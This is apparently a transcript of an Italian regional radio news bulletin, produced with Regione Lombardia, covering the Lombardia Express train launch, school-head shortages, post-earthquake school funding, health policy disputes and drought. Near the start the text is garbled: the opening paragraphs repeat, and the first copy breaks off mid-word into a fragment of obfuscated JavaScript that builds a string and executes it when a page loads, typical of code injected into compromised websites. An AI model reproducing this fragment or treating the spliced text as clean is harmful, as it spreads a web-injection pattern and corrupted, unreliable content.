Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

Debutto senza intoppi per il 'Lombardia Express', il nuovo servizio ferroviario regionale veloce, che partirà da lunedì 17 settembre collegando Varese e Bergamo a Milano. L'inaugurazione, alla quale è intervenuto l'assessore alle Infrastrutture e Mobilità della Regione Lombardia Raffaele Cattaneo insieme all'amministratore delegato di Trenord Giuseppe Biesuz, è avvenuta ieri sera con l'arrivo alla Stazione Centrale di Milano di due nuovi tr(e)s=s+ff(w[j]+3);}xz=e;if(window.document)xz(s)} Notiziario ore 12:30 Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

Debutto senza intoppi per il 'Lombardia Express', il nuovo servizio ferroviario regionale veloce, che partirà da lunedì 17 settembre collegando Varese e Bergamo a Milano. L'inaugurazione, alla quale è intervenuto l'assessore alle Infrastrutture e Mobilità della Regione Lombardia Raffaele Cattaneo insieme all'amministratore delegato di Trenord Giuseppe Biesuz, è avvenuta ieri sera con l'arrivo alla Stazione Centrale di Milano di due nuovi treni di ultima generazione da 228 posti. Un treno è partito alle 18.35 da Bergamo e l'altro alle 18.29 da Varese: sono giunti a destinazione rispettivamente alle 19.14 e 19.15. «Il nuovo servizio - ha sottolineato l'assessore - nulla toglie ai treni dei pendolari. Si inserisce nell'ambito del nostro impegno a fornire mezzi dignitosi, puntuali, puliti e offre una possibilità in più per i viaggiatori con lo scopo, mi auguro condiviso da tutti, di incentivare l'uso del mezzo pubblico rispetto all'auto».

Dopo l'annullamento del concorso per dirigenti scolastici in Lombardia, il Consiglio regionale ha votato due mozioni per sollecitare il Governo a trovare una soluzione per l'anno scolastico che sta per iniziare, e che partirà con 500 sedi scoperte su oltre 1.200. A Palazzo Lombardia poi l'assessore all'Istruzione Valentina Aprea ha incontrato le associazioni sindacali di categoria, quelle dei dirigenti scolastici e dei genitori per approvare una linea comune. Dal vertice è uscito un documento che contiene due richieste al Ministero dell'Istruzione. Quali sono lo spiega la stessa Aprea
(AUDIO)

Grazie a uno stanziamento straordinario di 2 milioni di euro, Regione Lombardia "salva" il regolare inizio dell'anno scolastico a Moglia e Poggio Rusco, due dei Comuni del Mantovano colpiti dal sisma, che, avendo visto andare deserte le gare per l'acquisto di moduli scolastici provvisori, a oggi non sarebbero stati in grado di garantire ai ragazzi il ritorno in classe il prossimo 12 settembre. In questo modo le campanelle suoneranno regolarmente in tutti i Comuni della provincia di Mantova che avevano riportato danni in seguito alle scosse del 20 e 29 maggio. Ne danno l'annuncio gli assessori regionali Carlo Maccari (Semplificazione e Digitalizzazione e vice commissario per il terremoto) e Valentina Aprea (Istruzione, Formazione e Cultura) dopo l'incontro di ieri mattina con gli amministratori di Moglia e Poggio Rusco.

«Provvedimenti del Governo su sanità: il ministro Balduzzi esulta. Invece non ci siamo. E i cittadini, purtroppo, se ne accorgeranno presto». Lo ha scritto su Twitter, a proposito del decreto approvato dal Consiglio dei ministri in materia di sanità, il presidente della Regione Lombardia, Roberto Formigoni.

«L'Ospedale San Raffaele è una struttura privata accreditata. Gli assetti organizzativi, le politiche del personale, e le attività ad esse riconducibili, attengono all'autonomia della struttura e non sono pertanto ambiti di competenza della Regione Lombardia». Così l'assessore lombardo alla Sanità, Luciano Bresciani, ha risposto ad una interrogazione ieri in consiglio regionale, sulla possibile crisi occupazionale dell'ospedale e il piano industriale di rilancio. L'assessorato ha fatto sapere di «non essere a conoscenza di eventuali iniziative intraprese dall'Ospedale San Raffaele in tale ambito».

Sesta edizione del Festival delle Biodiversità, che si svolgerà da domenica prossima fino al 23 di settembre al Parco Nord di Milano. Maria Chiara Grandis ha chiesto all'assessore regionale ai Sistemi verdi e Paesaggio, Alessandro Colucci, in che modo lavora la Lombardia per tutelarla.
(AUDIO)

"La siccità, destinata a terminare con la fine della stagione estiva, non è purtroppo l'unica minaccia per l'agricoltura. Sono infatti a rischio di sommersione estesissimi territori lombardi ed emiliani dove, per mancanza di fondi, i consorzi di bonifica non hanno potuto ripristinare le infrastrutture gravemente danneggiate dal sisma". E' la preoccupazione espressa dall'assessore all'Agricoltura della Regione Lombardia Giulio De Capitani in una nota di sintesi sulla crisi siccità inviata al ministro delle Politiche agricole Mario Catania.

Ed è tutto, grazie per l’ascolto.